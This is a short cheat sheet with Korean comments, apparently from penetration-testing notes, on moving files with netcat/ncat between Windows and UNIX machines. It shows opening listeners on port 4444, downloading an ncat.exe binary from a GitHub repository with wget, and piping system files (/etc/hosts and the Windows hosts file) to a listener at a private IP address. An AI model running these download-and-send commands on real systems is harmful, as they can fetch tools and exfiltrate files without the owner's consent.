ncat
# UNIX 환경에서 nc 서버 생성
nc -lvnp 4444
# Windows 환경에서 파일 전송
wget https://github.com/Mick3y-ko/Tools/raw/refs/heads/main/ncat.exe -outf ncat.exe
more C:\Windows\System32\drivers\etc\hosts | ncat 192.168.200.132 4444# Windows 환경에서 nc 서버 생성
wget https://github.com/Mick3y-ko/Tools/raw/refs/heads/main/ncat.exe -outf ncat.exe
.\ncat.exe -lvnp 4444
# UNIX 환경에서 파일 전송
cat /etc/hosts | nc 192.168.133.1 4444Last updated